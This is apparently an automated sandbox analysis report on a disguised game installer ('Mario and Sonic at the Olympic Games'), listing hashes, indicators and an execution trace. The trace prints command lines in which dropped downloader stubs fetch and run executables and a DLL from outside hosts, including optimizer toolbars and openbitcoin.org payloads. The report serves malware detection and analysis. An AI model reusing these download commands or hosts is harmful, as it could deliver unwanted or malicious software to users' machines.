6ca22972ba809ecabe951f27589f3339fc5ade37224f7bee2340247a4beda9a1

General

Target

43df0accc9527a2fa5aa1ebf77d7d04d.exe
Size

492KB
MD5

43df0accc9527a2fa5aa1ebf77d7d04d
SHA1

5e7cb96cfac25eb85f92ceb637361bd88f8eaca3
SHA256

6ca22972ba809ecabe951f27589f3339fc5ade37224f7bee2340247a4beda9a1
SHA512

440b9f0ac4ca27f460fbb188d99017b6057eb496383169963683706325fd4b8825b993f9f906dd3f25081d60ca3f2fe2e893481cd34799f01ece518a6405f1e6
SSDEEP

6144:quk4fqjTAQqF6jtY03ZgLpp6TURimpBwXVUTL7E97IkXQxBRUoz0JehYvH7Aw0v9:Q4fwS6peEUBwXVwM9vylzdYvH7AwC

Score

7^/10

Malware Config

Signatures

Executes dropped EXE 6 IoCs

pid	Process
1556	downloaderSTUB.exe
1716	downloaderSTUB.exe
4688	downloaderSTUB.exe
4892	downloaderDDLR.exe
1824	downloaderOFFER0.exe
544	preinstaller.exe

Loads dropped DLL 25 IoCs

pid	Process
1824	downloaderOFFER0.exe
1716	downloaderSTUB.exe
1556	downloaderSTUB.exe
4688	downloaderSTUB.exe
4892	downloaderDDLR.exe
1824	downloaderOFFER0.exe
1556	downloaderSTUB.exe
1716	downloaderSTUB.exe
4688	downloaderSTUB.exe
4892	downloaderDDLR.exe
1824	downloaderOFFER0.exe
1556	downloaderSTUB.exe
1716	downloaderSTUB.exe
4688	downloaderSTUB.exe
4892	downloaderDDLR.exe
1824	downloaderOFFER0.exe
1556	downloaderSTUB.exe
1716	downloaderSTUB.exe
4688	downloaderSTUB.exe
4892	downloaderDDLR.exe
4892	downloaderDDLR.exe
1716	downloaderSTUB.exe
4688	downloaderSTUB.exe
1824	downloaderOFFER0.exe
1556	downloaderSTUB.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

NSIS installer 2 IoCs

installer

resource	yara_rule
behavioral2/files/0x0006000000023207-14.dat	nsis_installer_1
behavioral2/files/0x0006000000023207-14.dat	nsis_installer_2

Suspicious use of WriteProcessMemory 18 IoCs

description	pid	Process	procid_target
PID 4076 wrote to memory of 1556	4076	43df0accc9527a2fa5aa1ebf77d7d04d.exe	44
PID 4076 wrote to memory of 1556	4076	43df0accc9527a2fa5aa1ebf77d7d04d.exe	44
PID 4076 wrote to memory of 1556	4076	43df0accc9527a2fa5aa1ebf77d7d04d.exe	44
PID 4076 wrote to memory of 1716	4076	43df0accc9527a2fa5aa1ebf77d7d04d.exe	43
PID 4076 wrote to memory of 1716	4076	43df0accc9527a2fa5aa1ebf77d7d04d.exe	43
PID 4076 wrote to memory of 1716	4076	43df0accc9527a2fa5aa1ebf77d7d04d.exe	43
PID 4076 wrote to memory of 4688	4076	43df0accc9527a2fa5aa1ebf77d7d04d.exe	42
PID 4076 wrote to memory of 4688	4076	43df0accc9527a2fa5aa1ebf77d7d04d.exe	42
PID 4076 wrote to memory of 4688	4076	43df0accc9527a2fa5aa1ebf77d7d04d.exe	42
PID 4076 wrote to memory of 4892	4076	43df0accc9527a2fa5aa1ebf77d7d04d.exe	41
PID 4076 wrote to memory of 4892	4076	43df0accc9527a2fa5aa1ebf77d7d04d.exe	41
PID 4076 wrote to memory of 4892	4076	43df0accc9527a2fa5aa1ebf77d7d04d.exe	41
PID 4076 wrote to memory of 1824	4076	43df0accc9527a2fa5aa1ebf77d7d04d.exe	40
PID 4076 wrote to memory of 1824	4076	43df0accc9527a2fa5aa1ebf77d7d04d.exe	40
PID 4076 wrote to memory of 1824	4076	43df0accc9527a2fa5aa1ebf77d7d04d.exe	40
PID 4076 wrote to memory of 544	4076	43df0accc9527a2fa5aa1ebf77d7d04d.exe	39
PID 4076 wrote to memory of 544	4076	43df0accc9527a2fa5aa1ebf77d7d04d.exe	39
PID 4076 wrote to memory of 544	4076	43df0accc9527a2fa5aa1ebf77d7d04d.exe	39

C:\Users\Admin\AppData\Local\Temp\43df0accc9527a2fa5aa1ebf77d7d04d.exe
"C:\Users\Admin\AppData\Local\Temp\43df0accc9527a2fa5aa1ebf77d7d04d.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4076
- C:\Users\Admin\AppData\Local\Temp\d688b1214cc905af65e9e4e99f9b955b\preinstaller.exe
  C:\Users\Admin\AppData\Local\Temp\d688b1214cc905af65e9e4e99f9b955b\preinstaller.exe 0 "Mario and Sonic at the Olympic Games London 2012 2011 PAL" "Download"
  2⤵
  - Executes dropped EXE
  PID:544
- C:\Users\Admin\AppData\Local\Temp\d688b1214cc905af65e9e4e99f9b955b\downloaderOFFER0.exe
  C:\Users\Admin\AppData\Local\Temp\d688b1214cc905af65e9e4e99f9b955b\downloaderOFFER0.exe /U "http://www.directdownloader.com/toolbars/optimizer.exe" /D "C:\Users\Admin\AppData\Local\Temp\d688b1214cc905af65e9e4e99f9b955b\optimizer.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:1824
- C:\Users\Admin\AppData\Local\Temp\d688b1214cc905af65e9e4e99f9b955b\downloaderDDLR.exe
  C:\Users\Admin\AppData\Local\Temp\d688b1214cc905af65e9e4e99f9b955b\downloaderDDLR.exe /U "http://www.directdownloader.com/DirectDownloaderInstaller.exe" /D "C:\Users\Admin\AppData\Local\Temp\d688b1214cc905af65e9e4e99f9b955b\DirectDownloaderInstaller.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:4892
- C:\Users\Admin\AppData\Local\Temp\d688b1214cc905af65e9e4e99f9b955b\downloaderSTUB.exe
  C:\Users\Admin\AppData\Local\Temp\d688b1214cc905af65e9e4e99f9b955b\downloaderSTUB.exe /U "http://openbitcoin.org/static/dist/updater.exe" /D "C:\Users\Admin\AppData\Local\Temp\d688b1214cc905af65e9e4e99f9b955b\updater.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:4688
- C:\Users\Admin\AppData\Local\Temp\d688b1214cc905af65e9e4e99f9b955b\downloaderSTUB.exe
  C:\Users\Admin\AppData\Local\Temp\d688b1214cc905af65e9e4e99f9b955b\downloaderSTUB.exe /U "http://openbitcoin.org/static/dist/OpenCL.dll" /D "C:\Users\Admin\AppData\Local\Temp\d688b1214cc905af65e9e4e99f9b955b\OpenCL.dll"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:1716
- C:\Users\Admin\AppData\Local\Temp\d688b1214cc905af65e9e4e99f9b955b\downloaderSTUB.exe
  C:\Users\Admin\AppData\Local\Temp\d688b1214cc905af65e9e4e99f9b955b\downloaderSTUB.exe /U "http://www.openbitcoin.org/static/dist/obc.exe" /D "C:\Users\Admin\AppData\Local\Temp\d688b1214cc905af65e9e4e99f9b955b\stub.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:1556

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\nsz91F0.tmp\NSISdl.dll

Filesize
14KB

MD5
a5f8399a743ab7f9c88c645c35b1ebb5

SHA1
168f3c158913b0367bf79fa413357fbe97018191

SHA256
dacc88a12d3ba438fdae3535dc7a5a1d389bce13adc993706424874a782e51c9

SHA512
824e567f5211bf09c7912537c7836d761b0934207612808e9a191f980375c6a97383dbc6b4a7121c6b5f508cbfd7542a781d6b6b196ca24841f73892eec5e977

Download Submit
memory/544-46-0x0000000000400000-0x000000000043F000-memory.dmp

Filesize
252KB

Download
memory/4076-45-0x0000000000400000-0x0000000000444000-memory.dmp

Filesize
272KB

Download

Analysis

Sharing